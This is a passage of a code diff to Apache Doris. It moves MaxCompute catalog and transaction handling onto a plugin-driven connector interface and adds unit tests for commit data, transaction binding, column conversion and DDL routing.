a/fe/fe-core/src/main/java/org/apache/doris/tablefunction/PartitionsTableValuedFunction.java +++ b/fe/fe-core/src/main/java/org/apache/doris/tablefunction/PartitionsTableValuedFunction.java @@ -28,10 +28,10 @@ import org.apache.doris.common.MetaNotFoundException; import org.apache.doris.datasource.CatalogIf; import org.apache.doris.datasource.InternalCatalog; +import org.apache.doris.datasource.PluginDrivenExternalCatalog; +import org.apache.doris.datasource.PluginDrivenExternalTable; import org.apache.doris.datasource.hive.HMSExternalCatalog; import org.apache.doris.datasource.hive.HMSExternalTable; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalCatalog; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalTable; import org.apache.doris.mysql.privilege.PrivPredicate; import org.apache.doris.nereids.exceptions.AnalysisException; import org.apache.doris.qe.ConnectContext; @@ -170,7 +170,7 @@ private void analyze(String catalogName, String dbName, String tableName) { } // disallow unsupported catalog if (!(catalog.isInternalCatalog() || catalog instanceof HMSExternalCatalog - || catalog instanceof MaxComputeExternalCatalog)) { + || catalog instanceof PluginDrivenExternalCatalog)) { throw new AnalysisException(String.format("Catalog of type '%s' is not allowed in ShowPartitionsStmt", catalog.getType())); } @@ -182,7 +182,8 @@ private void analyze(String catalogName, String dbName, String tableName) { TableIf table = null; try { table = db.get().getTableOrMetaException(tableName, TableType.OLAP, - TableType.HMS_EXTERNAL_TABLE, TableType.MAX_COMPUTE_EXTERNAL_TABLE); + TableType.HMS_EXTERNAL_TABLE, TableType.MAX_COMPUTE_EXTERNAL_TABLE, + TableType.PLUGIN_EXTERNAL_TABLE); } catch (MetaNotFoundException e) { throw new AnalysisException(e.getMessage(), e); } @@ -197,8 +198,12 @@ private void analyze(String catalogName, String dbName, String tableName) { return; } - if (table instanceof MaxComputeExternalTable) { - if (((MaxComputeExternalTable) table).getOdpsTable().getPartitions().isEmpty()) { + if (table instanceof PluginDrivenExternalTable) { + // Keyed on partition columns (isPartitionedTable), consistent with the SHOW PARTITIONS + // gate (ShowPartitionsCommand). A partitioned-but-empty table returns 0 rows rather than + // throwing -- a deliberate, more-correct deviation from legacy MC's partition-instance + // check above. + if (!((PluginDrivenExternalTable) table).isPartitionedTable()) { throw new AnalysisException("Table " + tableName + " is not a partitioned table"); } } diff --git a/fe/fe-core/src/main/java/org/apache/doris/transaction/CommitDataSerializer.java b/fe/fe-core/src/main/java/org/apache/doris/transaction/CommitDataSerializer.java new file mode 100644 index 00000000000000..926e96086387b8 --- /dev/null +++ b/fe/fe-core/src/main/java/org/apache/doris/transaction/CommitDataSerializer.java @@ -0,0 +1,58 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.transaction; + +import org.apache.thrift.TBase; +import org.apache.thrift.TException; +import org.apache.thrift.TSerializer; +import org.apache.thrift.protocol.TBinaryProtocol; + +import java.util.List; + +/** + * Serializes connector-specific Thrift commit fragments produced by BE and feeds + * them, one fragment at a time, into a {@link Transaction} through + * {@link Transaction#addCommitData(byte[])}. + * + *

This is the single place the FE-side serialization protocol is defined. It + * MUST match the deserialization protocol used by the write transactions' + * {@code addCommitData} overrides (maxcompute / hive / iceberg); the + * {@code CommitDataSerializerTest} golden tests pin that agreement.

+ */ +public final class CommitDataSerializer { + + private CommitDataSerializer() { + } + + /** + * Serializes each commit fragment and accumulates it into {@code txn}. + * + * @param txn the transaction collecting commit data for this write + * @param fragments connector-specific Thrift commit fragments, one per BE write fragment + */ + public static void feed(Transaction txn, List> fragments) { + try { + TSerializer serializer = new TSerializer(new TBinaryProtocol.Factory()); + for (TBase fragment : fragments) { + txn.addCommitData(serializer.serialize(fragment)); + } + } catch (TException e) { + throw new RuntimeException("failed to serialize connector commit data", e); + } + } +} diff --git a/fe/fe-core/src/main/java/org/apache/doris/transaction/PluginDrivenTransactionManager.java b/fe/fe-core/src/main/java/org/apache/doris/transaction/PluginDrivenTransactionManager.java index 4374a42f674e75..18b7de5059cb82 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/transaction/PluginDrivenTransactionManager.java +++ b/fe/fe-core/src/main/java/org/apache/doris/transaction/PluginDrivenTransactionManager.java @@ -71,7 +71,13 @@ public long begin() { public long begin(ConnectorTransaction connectorTx) { Objects.requireNonNull(connectorTx, "connectorTx"); long txnId = connectorTx.getTransactionId(); - transactions.put(txnId, new PluginDrivenTransaction(txnId, connectorTx)); + PluginDrivenTransaction txn = new PluginDrivenTransaction(txnId, connectorTx); + transactions.put(txnId, txn); + // Register globally so the BE block-allocation RPC and the commit-data feedback can + // look the transaction up by id (FrontendServiceImpl.getMaxComputeBlockIdRange -> + // getTxnById). Mirrors AbstractExternalTransactionManager.begin. The legacy no-arg + // begin() path (JDBC/ES auto-commit) needs no such callback and stays local-only. + Env.getCurrentEnv().getGlobalExternalTransactionInfoMgr().putTxnById(txnId, txn); LOG.debug("Plugin-driven transaction begun with SPI ConnectorTransaction: {}", txnId); return txnId; } @@ -79,18 +85,28 @@ public long begin(ConnectorTransaction connectorTx) { @Override public void commit(long id) throws UserException { PluginDrivenTransaction txn = transactions.remove(id); - if (txn != null) { - txn.commit(); - LOG.debug("Plugin-driven transaction committed: {}", id); + try { + if (txn != null) { + txn.commit(); + LOG.debug("Plugin-driven transaction committed: {}", id); + } + } finally { + // Always deregister from the global registry, even if connectorTx.commit() throws, + // so a failed commit cannot leave a stale entry behind (mirrors rollback()). + Env.getCurrentEnv().getGlobalExternalTransactionInfoMgr().removeTxnById(id); } } @Override public void rollback(long id) { PluginDrivenTransaction txn = transactions.remove(id); - if (txn != null) { - txn.rollback(); - LOG.debug("Plugin-driven transaction rolled back: {}", id); + try { + if (txn != null) { + txn.rollback(); + LOG.debug("Plugin-driven transaction rolled back: {}", id); + } + } finally { + Env.getCurrentEnv().getGlobalExternalTransactionInfoMgr().removeTxnById(id); } } @@ -142,6 +158,32 @@ public void rollback() { } } + @Override + public void addCommitData(byte[] commitFragment) { + if (connectorTx != null) { + connectorTx.addCommitData(commitFragment); + } + // legacy no-op marker: nothing to accumulate + } + + @Override + public boolean supportsWriteBlockAllocation() { + return connectorTx != null && connectorTx.supportsWriteBlockAllocation(); + } + + @Override + public long allocateWriteBlockRange(String writeSessionId, long count) throws UserException { + if (connectorTx == null) { + throw new UnsupportedOperationException("write block allocation not supported"); + } + return connectorTx.allocateWriteBlockRange(writeSessionId, count); + } + + @Override + public long getUpdateCnt() { + return connectorTx == null ? 0 : connectorTx.getUpdateCnt(); + } + private void closeQuietly() { try { connectorTx.close(); diff --git a/fe/fe-core/src/main/java/org/apache/doris/transaction/Transaction.java b/fe/fe-core/src/main/java/org/apache/doris/transaction/Transaction.java index b319fb78983324..ecb21b487a667d 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/transaction/Transaction.java +++ b/fe/fe-core/src/main/java/org/apache/doris/transaction/Transaction.java @@ -24,4 +24,45 @@ public interface Transaction { void commit() throws UserException; void rollback(); + + /** + * Receives one serialized commit fragment produced by BE after writing a + * data fragment. Implementations deserialize their connector-specific Thrift + * payload and accumulate it for {@link #commit()}. + * + *

Default is a no-op for transactions that do not collect BE commit data.

+ * + * @param commitFragment the serialized connector-specific commit payload + */ + default void addCommitData(byte[] commitFragment) { + // no-op: write transactions override this + } + + /** + * Whether this transaction allocates write block ranges through a write-time + * BE→FE callback (e.g. maxcompute). Default {@code false}. + */ + default boolean supportsWriteBlockAllocation() { + return false; + } + + /** + * Allocates a contiguous range of write block ids for the given write + * session, returning the first allocated id. Only invoked when + * {@link #supportsWriteBlockAllocation()} returns {@code true}; the default + * throws. + * + * @param writeSessionId opaque connector-defined write session identifier + * @param count number of block ids to allocate + * @return the first allocated block id + * @throws UserException on validation failure or allocation overflow + */ + default long allocateWriteBlockRange(String writeSessionId, long count) throws UserException { + throw new UnsupportedOperationException("write block allocation not supported"); + } + + /** Returns the number of rows affected by the write(s) in this transaction. */ + default long getUpdateCnt() { + return 0; + } } diff --git a/fe/fe-core/src/main/java/org/apache/doris/transaction/TransactionManagerFactory.java b/fe/fe-core/src/main/java/org/apache/doris/transaction/TransactionManagerFactory.java index 9a5584a0601874..f8040f0ea6d6a8 100644 --- a/fe/fe-core/src/main/java/org/apache/doris/transaction/TransactionManagerFactory.java +++ b/fe/fe-core/src/main/java/org/apache/doris/transaction/TransactionManagerFactory.java @@ -19,7 +19,6 @@ import org.apache.doris.datasource.hive.HiveMetadataOps; import org.apache.doris.datasource.iceberg.IcebergMetadataOps; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalCatalog; import org.apache.doris.fs.SpiSwitchingFileSystem; import java.util.concurrent.Executor; @@ -34,8 +33,4 @@ public static TransactionManager createHiveTransactionManager(HiveMetadataOps op public static TransactionManager createIcebergTransactionManager(IcebergMetadataOps ops) { return new IcebergTransactionManager(ops); } - - public static TransactionManager createMCTransactionManager(MaxComputeExternalCatalog catalog) { - return new MCTransactionManager(catalog); - } } diff --git a/fe/fe-core/src/test/java/org/apache/doris/connector/ConnectorSessionImplTest.java b/fe/fe-core/src/test/java/org/apache/doris/connector/ConnectorSessionImplTest.java index fe9e3e68cde6d9..059c2a806be5bd 100644 --- a/fe/fe-core/src/test/java/org/apache/doris/connector/ConnectorSessionImplTest.java +++ b/fe/fe-core/src/test/java/org/apache/doris/connector/ConnectorSessionImplTest.java @@ -18,12 +18,14 @@ package org.apache.doris.connector; import org.apache.doris.connector.api.ConnectorSession; +import org.apache.doris.connector.api.handle.ConnectorTransaction; import org.junit.jupiter.api.Assertions; import org.junit.jupiter.api.Test; import java.util.HashMap; import java.util.Map; +import java.util.Optional; /** * Tests for {@link ConnectorSessionImpl} and {@link ConnectorSessionBuilder}. @@ -178,4 +180,69 @@ public void testDefaultValues() { Assertions.assertEquals("en_US", session.getLocale()); Assertions.assertEquals("", session.getCatalogName()); } + + // ──────────────── transaction binding (P4-T06a W-a / gap G1) ──────────────── + + // The session is otherwise immutable, but the insert executor binds a connector + // transaction onto it at write time (setCurrentTransaction) so the connector's + // planWrite can read it back (getCurrentTransaction). If this round-trip regresses, + // the maxcompute write plan fails loud ("no transaction on session") at bind time. + + @Test + public void testCurrentTransactionIsEmptyBeforeBinding() { + ConnectorSession session = ConnectorSessionBuilder.create().build(); + Assertions.assertEquals(Optional.empty(), session.getCurrentTransaction(), + "a freshly built session must carry no transaction"); + } + + @Test + public void testSetCurrentTransactionBindsThenReadsBackSameInstance() { + ConnectorSession session = ConnectorSessionBuilder.create().build(); + ConnectorTransaction txn = new StubConnectorTransaction(1234L); + + session.setCurrentTransaction(txn); + + Optional bound = session.getCurrentTransaction(); + Assertions.assertTrue(bound.isPresent(), "transaction must be present after binding"); + Assertions.assertSame(txn, bound.get(), + "getCurrentTransaction must return the exact instance the executor bound, " + + "because planWrite stamps that transaction's id into the sink"); + } + + @Test + public void testSetCurrentTransactionNullUnbindsToEmpty() { + ConnectorSession session = ConnectorSessionBuilder.create().build(); + session.setCurrentTransaction(new StubConnectorTransaction(1L)); + + session.setCurrentTransaction(null); + + Assertions.assertEquals(Optional.empty(), session.getCurrentTransaction(), + "binding null must clear the transaction back to empty (Optional.ofNullable semantics)"); + } + + /** Minimal hand-written {@link ConnectorTransaction}; only identity matters for this test. */ + private static final class StubConnectorTransaction implements ConnectorTransaction { + private final long txnId; + + private StubConnectorTransaction(long txnId) { + this.txnId = txnId; + } + + @Override + public long getTransactionId() { + return txnId; + } + + @Override + public void commit() { + } + + @Override + public void rollback() { + } + + @Override + public void close() { + } + } } diff --git a/fe/fe-core/src/test/java/org/apache/doris/connector/ddl/CreateTableInfoToConnectorRequestConverterTest.java b/fe/fe-core/src/test/java/org/apache/doris/connector/ddl/CreateTableInfoToConnectorRequestConverterTest.java index dc5e571fccafc2..c0c42b6a8ea6e3 100644 --- a/fe/fe-core/src/test/java/org/apache/doris/connector/ddl/CreateTableInfoToConnectorRequestConverterTest.java +++ b/fe/fe-core/src/test/java/org/apache/doris/connector/ddl/CreateTableInfoToConnectorRequestConverterTest.java @@ -17,6 +17,7 @@ package org.apache.doris.connector.ddl; +import org.apache.doris.catalog.AggregateType; import org.apache.doris.catalog.PartitionType; import org.apache.doris.connector.api.ConnectorColumn; import org.apache.doris.connector.api.ddl.ConnectorBucketSpec; @@ -96,6 +97,95 @@ public void columnsAndScalarFieldsArePassedThrough() { Assertions.assertNull(req.getBucketSpec()); } + @Test + public void autoIncInitValueIsPropagatedAsIsAutoInc() { + // ColumnDefinition is mocked (its auto-inc ctor pulls in ColumnNullableType machinery); + // the converter only reads these getters. A column is auto-inc when getAutoIncInitValue() != -1. + ColumnDefinition autoIncCol = Mockito.mock(ColumnDefinition.class); + Mockito.when(autoIncCol.getName()).thenReturn("id"); + Mockito.when(autoIncCol.getType()).thenReturn(IntegerType.INSTANCE); + Mockito.when(autoIncCol.getComment()).thenReturn(""); + Mockito.when(autoIncCol.isNullable()).thenReturn(false); + Mockito.when(autoIncCol.isKey()).thenReturn(false); + Mockito.when(autoIncCol.getAutoIncInitValue()).thenReturn(1L); // != -1 => auto-increment + + CreateTableInfo info = stubInfo("t", Collections.singletonList(autoIncCol), + null, null, "", Collections.emptyMap(), false, false); + ConnectorCreateTableRequest req = CreateTableInfoToConnectorRequestConverter.convert(info, "db"); + + // WHY (Rule 9): the connector can only reject what the converter carries. This proves the + // auto-inc flag survives the ColumnDefinition -> ConnectorColumn boundary (without it, the + // connector's auto-inc rejection would be dead code). MUTATION: reverting the converter to + // the 6-arg ctor (dropping `d.getAutoIncInitValue() != -1`) makes this red. + Assertions.assertTrue(req.getColumns().get(0).isAutoInc(), + "autoIncInitValue != -1 must propagate to ConnectorColumn.isAutoInc"); + } + + @Test + public void plainColumnIsNotAutoInc() { + ColumnDefinition plainCol = Mockito.mock(ColumnDefinition.class); + Mockito.when(plainCol.getName()).thenReturn("c"); + Mockito.when(plainCol.getType()).thenReturn(IntegerType.INSTANCE); + Mockito.when(plainCol.getComment()).thenReturn(""); + Mockito.when(plainCol.isNullable()).thenReturn(true); + Mockito.when(plainCol.isKey()).thenReturn(false); + Mockito.when(plainCol.getAutoIncInitValue()).thenReturn(-1L); // default => not auto-increment + + CreateTableInfo info = stubInfo("t", Collections.singletonList(plainCol), + null, null, "", Collections.emptyMap(), false, false); + ConnectorCreateTableRequest req = CreateTableInfoToConnectorRequestConverter.convert(info, "db"); + + // WHY: guards the `!= -1` predicate boundary -- a normal column must map to false, not true + // (catches an inverted or constant-true mistake). + Assertions.assertFalse(req.getColumns().get(0).isAutoInc(), + "autoIncInitValue == -1 (a normal column) must map to isAutoInc=false"); + } + + @Test + public void aggTypePropagatedAsIsAggregated() { + // ColumnDefinition is mocked; the converter computes isAggregated from getAggType() + // (mirroring Column.isAggregated()): non-null and non-NONE. + ColumnDefinition aggCol = Mockito.mock(ColumnDefinition.class); + Mockito.when(aggCol.getName()).thenReturn("c"); + Mockito.when(aggCol.getType()).thenReturn(IntegerType.INSTANCE); + Mockito.when(aggCol.getComment()).thenReturn(""); + Mockito.when(aggCol.isNullable()).thenReturn(false); + Mockito.when(aggCol.isKey()).thenReturn(false); + Mockito.when(aggCol.getAutoIncInitValue()).thenReturn(-1L); + Mockito.when(aggCol.getAggType()).thenReturn(AggregateType.SUM); + + CreateTableInfo info = stubInfo("t", Collections.singletonList(aggCol), + null, null, "", Collections.emptyMap(), false, false); + ConnectorCreateTableRequest req = CreateTableInfoToConnectorRequestConverter.convert(info, "db"); + + // WHY (Rule 9): the connector can only reject what the converter carries. This proves the + // aggregate flag survives the ColumnDefinition -> ConnectorColumn boundary (without it the + // connector's aggregate rejection would be dead code). MUTATION: dropping the 8th ctor arg + // (or forcing the boolean false) in the converter makes this red. + Assertions.assertTrue(req.getColumns().get(0).isAggregated(), + "non-NONE aggType must propagate to ConnectorColumn.isAggregated"); + } + + @Test + public void plainColumnIsNotAggregated() { + ColumnDefinition plainCol = Mockito.mock(ColumnDefinition.class); + Mockito.when(plainCol.getName()).thenReturn("c"); + Mockito.when(plainCol.getType()).thenReturn(IntegerType.INSTANCE); + Mockito.when(plainCol.getComment()).thenReturn(""); + Mockito.when(plainCol.isNullable()).thenReturn(true); + Mockito.when(plainCol.isKey()).thenReturn(false); + Mockito.when(plainCol.getAutoIncInitValue()).thenReturn(-1L); + Mockito.when(plainCol.getAggType()).thenReturn(null); // no aggregate type + + CreateTableInfo info = stubInfo("t", Collections.singletonList(plainCol), + null, null, "", Collections.emptyMap(), false, false); + ConnectorCreateTableRequest req = CreateTableInfoToConnectorRequestConverter.convert(info, "db"); + + // WHY: guards the boundary -- a normal column (null/NONE aggType) must map to false. + Assertions.assertFalse(req.getColumns().get(0).isAggregated(), + "null aggType (a normal column) must map to isAggregated=false"); + } + @Test public void identityPartitionStyle() { // PARTITIONED BY (dt) on a Hive-style external table. diff --git a/fe/fe-core/src/test/java/org/apache/doris/connector/fake/ConnectorTransactionDefaultsTest.java b/fe/fe-core/src/test/java/org/apache/doris/connector/fake/ConnectorTransactionDefaultsTest.java new file mode 100644 index 00000000000000..1fc47c7c61d3d7 --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/connector/fake/ConnectorTransactionDefaultsTest.java @@ -0,0 +1,74 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.fake; + +import org.apache.doris.connector.api.handle.ConnectorTransaction; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +/** + * Verifies the default (read-only) behavior of the write-SPI surface added to + * {@link ConnectorTransaction} in W-phase W1. A connector that does not + * participate in writes leaves all four methods at their defaults. + */ +public class ConnectorTransactionDefaultsTest { + + /** Minimal read-only transaction: overrides only the abstract methods. */ + private static final class ReadOnlyTransaction implements ConnectorTransaction { + @Override + public long getTransactionId() { + return 1L; + } + + @Override + public void commit() { + } + + @Override + public void rollback() { + } + + @Override + public void close() { + } + } + + @Test + void addCommitDataDefaultIsNoOp() { + // A read-only connector must silently ignore commit fragments, not throw. + new ReadOnlyTransaction().addCommitData(new byte[] {1, 2, 3}); + } + + @Test + void supportsWriteBlockAllocationDefaultsFalse() { + Assertions.assertFalse(new ReadOnlyTransaction().supportsWriteBlockAllocation()); + } + + @Test + void allocateWriteBlockRangeDefaultThrows() { + ConnectorTransaction txn = new ReadOnlyTransaction(); + Assertions.assertThrows(UnsupportedOperationException.class, + () -> txn.allocateWriteBlockRange("session", 10L)); + } + + @Test + void getUpdateCntDefaultsZero() { + Assertions.assertEquals(0L, new ReadOnlyTransaction().getUpdateCnt()); + } +} diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/ConnectorColumnConverterTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/ConnectorColumnConverterTest.java index cacc70d94560f4..f41fc0d76f7772 100644 --- a/fe/fe-core/src/test/java/org/apache/doris/datasource/ConnectorColumnConverterTest.java +++ b/fe/fe-core/src/test/java/org/apache/doris/datasource/ConnectorColumnConverterTest.java @@ -139,4 +139,26 @@ void testDecimalTypeRoundtrip() { Assertions.assertEquals(18, ct.getPrecision()); Assertions.assertEquals(6, ct.getScale()); } + + @Test + void testCharVarcharLengthPreserved() { + // Regression: CHAR/VARCHAR carry length in `len`, not `precision`; the + // converter must encode the length into the ConnectorType precision field + // so it survives the CREATE TABLE request path (previously emitted 0). + ScalarType charType = ScalarType.createCharType(20); + ConnectorType charCt = ConnectorColumnConverter.toConnectorType(charType); + Assertions.assertEquals("CHAR", charCt.getTypeName()); + Assertions.assertEquals(20, charCt.getPrecision()); + Type charBack = ConnectorColumnConverter.convertType(charCt); + Assertions.assertTrue(charBack instanceof ScalarType); + Assertions.assertEquals(20, ((ScalarType) charBack).getLength()); + + ScalarType varcharType = ScalarType.createVarcharType(255); + ConnectorType varcharCt = ConnectorColumnConverter.toConnectorType(varcharType); + Assertions.assertEquals("VARCHAR", varcharCt.getTypeName()); + Assertions.assertEquals(255, varcharCt.getPrecision()); + Type varcharBack = ConnectorColumnConverter.convertType(varcharCt); + Assertions.assertTrue(varcharBack instanceof ScalarType); + Assertions.assertEquals(255, ((ScalarType) varcharBack).getLength()); + } } diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/ExternalMetaCacheRouteResolverTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/ExternalMetaCacheRouteResolverTest.java index 55cc0d32dc9fc6..85527090abb5d3 100644 --- a/fe/fe-core/src/test/java/org/apache/doris/datasource/ExternalMetaCacheRouteResolverTest.java +++ b/fe/fe-core/src/test/java/org/apache/doris/datasource/ExternalMetaCacheRouteResolverTest.java @@ -23,7 +23,6 @@ import org.apache.doris.datasource.doris.RemoteDorisExternalCatalog; import org.apache.doris.datasource.hive.HMSExternalCatalog; import org.apache.doris.datasource.iceberg.IcebergHMSExternalCatalog; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalCatalog; import org.apache.doris.datasource.metacache.ExternalMetaCache; import org.apache.doris.datasource.metacache.MetaCacheEntry; import org.apache.doris.datasource.metacache.MetaCacheEntryStats; @@ -59,7 +58,6 @@ public void testEngineAliasCompatibility() { ExternalMetaCacheMgr metaCacheMgr = new ExternalMetaCacheMgr(true); Assert.assertEquals("hive", metaCacheMgr.engine("hms").engine()); Assert.assertEquals("doris", metaCacheMgr.engine("External_Doris").engine()); - Assert.assertEquals("maxcompute", metaCacheMgr.engine("max_compute").engine()); } @Test @@ -84,10 +82,6 @@ public void testRouteByCatalogType() { new PaimonExternalCatalog(3L, "paimon", null, Collections.emptyMap(), ""), 3L); Assert.assertEquals(java.util.Collections.singletonList("paimon"), paimonEngines); - List maxComputeEngines = metaCacheMgr.resolveCatalogEngineNamesForTest( - new MaxComputeExternalCatalog(4L, "maxcompute", null, Collections.emptyMap(), ""), 4L); - Assert.assertEquals(java.util.Collections.singletonList("maxcompute"), maxComputeEngines); - List dorisEngines = metaCacheMgr.resolveCatalogEngineNamesForTest( new RemoteDorisExternalCatalog(5L, "doris", null, Collections.emptyMap(), ""), 5L); Assert.assertEquals(java.util.Collections.singletonList("doris"), dorisEngines); diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalCatalogDdlRoutingTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalCatalogDdlRoutingTest.java new file mode 100644 index 00000000000000..09c6eaf0030852 --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalCatalogDdlRoutingTest.java @@ -0,0 +1,618 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.datasource; + +import org.apache.doris.catalog.Env; +import org.apache.doris.common.DdlException; +import org.apache.doris.common.UserException; +import org.apache.doris.connector.api.Connector; +import org.apache.doris.connector.api.ConnectorMetadata; +import org.apache.doris.connector.api.ConnectorSession; +import org.apache.doris.connector.api.DorisConnectorException; +import org.apache.doris.connector.api.ddl.ConnectorCreateTableRequest; +import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.connector.ddl.CreateTableInfoToConnectorRequestConverter; +import org.apache.doris.nereids.trees.plans.commands.info.CreateTableInfo; +import org.apache.doris.persist.EditLog; + +import org.junit.jupiter.api.AfterEach; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.BeforeEach; +import org.junit.jupiter.api.Test; +import org.mockito.ArgumentCaptor; +import org.mockito.MockedStatic; +import org.mockito.Mockito; + +import java.util.HashMap; +import java.util.Map; +import java.util.Optional; + +/** + * Tests for {@link PluginDrivenExternalCatalog}'s DDL overrides (createDb / dropDb / + * dropTable) added by P4-T06c, and the cache-invalidation fix to the existing + * createTable override. + * + *

Why these tests matter: after the MaxCompute SPI cutover (T06b), a + * {@code max_compute} catalog is a {@link PluginDrivenExternalCatalog} whose + * {@code metadataOps} is always {@code null}. Without these overrides every DDL + * would hit the base class and throw "… is not supported for catalog". These tests + * lock in that DDL is routed to the connector SPI instead, that connector failures + * are surfaced as {@link DdlException} (caller contract), that the SPI's missing + * {@code ifNotExists}/{@code ifExists} semantics are enforced FE-side, and that the + * FE metadata cache is invalidated after each op so the change is visible on the + * same FE — exactly what the legacy {@code MaxComputeMetadataOps.afterX()} hooks did.

+ */ +public class PluginDrivenExternalCatalogDdlRoutingTest { + + private MockedStatic mockedEnv; + private EditLog mockEditLog; + private Connector connector; + private ConnectorMetadata metadata; + private ConnectorSession session; + private TestablePluginCatalog catalog; + + @BeforeEach + public void setUp() { + connector = Mockito.mock(Connector.class); + metadata = Mockito.mock(ConnectorMetadata.class); + session = Mockito.mock(ConnectorSession.class); + Mockito.when(connector.getMetadata(Mockito.any())).thenReturn(metadata); + + // Construct with the real Env singleton (the constructor is Env-safe), then + // activate the static Env mock so the DDL overrides' edit-log writes are no-ops. + catalog = new TestablePluginCatalog(connector); + catalog.sessionMock = session; + + Env mockEnv = Mockito.mock(Env.class); + mockEditLog = Mockito.mock(EditLog.class); + mockedEnv = Mockito.mockStatic(Env.class); + mockedEnv.when(Env::getCurrentEnv).thenReturn(mockEnv); + Mockito.when(mockEnv.getEditLog()).thenReturn(mockEditLog); + } + + @AfterEach + public void tearDown() { + if (mockedEnv != null) { + mockedEnv.close(); + } + } + + // ==================== CREATE DATABASE ==================== + + @Test + public void testCreateDbRoutesToConnectorAndInvalidatesCache() throws Exception { + Map props = new HashMap<>(); + props.put("k", "v"); + + catalog.createDb("db1", false, props); + + Mockito.verify(metadata).createDatabase(session, "db1", props); + Mockito.verify(mockEditLog).logCreateDb(Mockito.any()); + Assertions.assertEquals(1, catalog.resetMetaCacheNamesCount, + "createDb must invalidate the catalog db-name cache (legacy afterCreateDb parity)"); + } + + @Test + public void testCreateDbIfNotExistsShortCircuitsWhenDbExists() throws Exception { + catalog.dbNullableResult = Mockito.mock(ExternalDatabase.class); + + catalog.createDb("db1", true, new HashMap<>()); + + Mockito.verify(metadata, Mockito.never()).createDatabase(Mockito.any(), Mockito.any(), Mockito.any()); + Mockito.verify(mockEditLog, Mockito.never()).logCreateDb(Mockito.any()); + Assertions.assertEquals(0, catalog.resetMetaCacheNamesCount); + } + + @Test + public void testCreateDbWrapsConnectorException() { + Mockito.doThrow(new DorisConnectorException("boom")) + .when(metadata).createDatabase(Mockito.any(), Mockito.any(), Mockito.any()); + + DdlException ex = Assertions.assertThrows(DdlException.class, + () -> catalog.createDb("db1", false, new HashMap<>())); + Assertions.assertTrue(ex.getMessage().contains("boom")); + } + + @Test + public void testCreateDbIfNotExistsSkipsWhenRemoteExistsAndConnectorSupportsCreate() throws Exception { + catalog.dbNullableResult = null; // FE-cache miss + Mockito.when(metadata.supportsCreateDatabase()).thenReturn(true); + Mockito.when(metadata.databaseExists(session, "db1")).thenReturn(true); + + catalog.createDb("db1", true, new HashMap<>()); + + // WHY (Rule 9): DG-4 regression -- a db that exists REMOTELY but is not yet in this FE's + // cache must make CREATE DATABASE IF NOT EXISTS a clean no-op (legacy createDbImpl consulted + // the remote databaseExist), NOT surface a remote "already exists" error. A mutation that + // removes the remote precheck calls createDatabase/logCreateDb -> these never() asserts red. + Mockito.verify(metadata).databaseExists(session, "db1"); + Mockito.verify(metadata, Mockito.never()).createDatabase(Mockito.any(), Mockito.any(), Mockito.any()); + Mockito.verify(mockEditLog, Mockito.never()).logCreateDb(Mockito.any()); + Assertions.assertEquals(0, catalog.resetMetaCacheNamesCount); + } + + @Test + public void testCreateDbIfNotExistsCreatesWhenRemoteAbsent() throws Exception { + catalog.dbNullableResult = null; // FE-cache miss + Mockito.when(metadata.supportsCreateDatabase()).thenReturn(true); + Mockito.when(metadata.databaseExists(session, "db1")).thenReturn(false); // absent remotely + Map props = new HashMap<>(); + + catalog.createDb("db1", true, props); + + // WHY: remote-absent must still create + editlog + cache reset -- proves the fix did not + // degrade IF NOT EXISTS into "never create". Paired with the test above (exists<->absent), + // this pins both sides of legacy createDbImpl's existence branch. + Mockito.verify(metadata).databaseExists(session, "db1"); + Mockito.verify(metadata).createDatabase(session, "db1", props); + Mockito.verify(mockEditLog).logCreateDb(Mockito.any()); + Assertions.assertEquals(1, catalog.resetMetaCacheNamesCount); + } + + @Test + public void testCreateDbIfNotExistsBypassesPrecheckWhenConnectorLacksCreateSupport() throws Exception { + catalog.dbNullableResult = null; // FE-cache miss + // supportsCreateDatabase() defaults to false on the mock -- the connector cannot create + // databases (jdbc/es/trino). databaseExists is intentionally 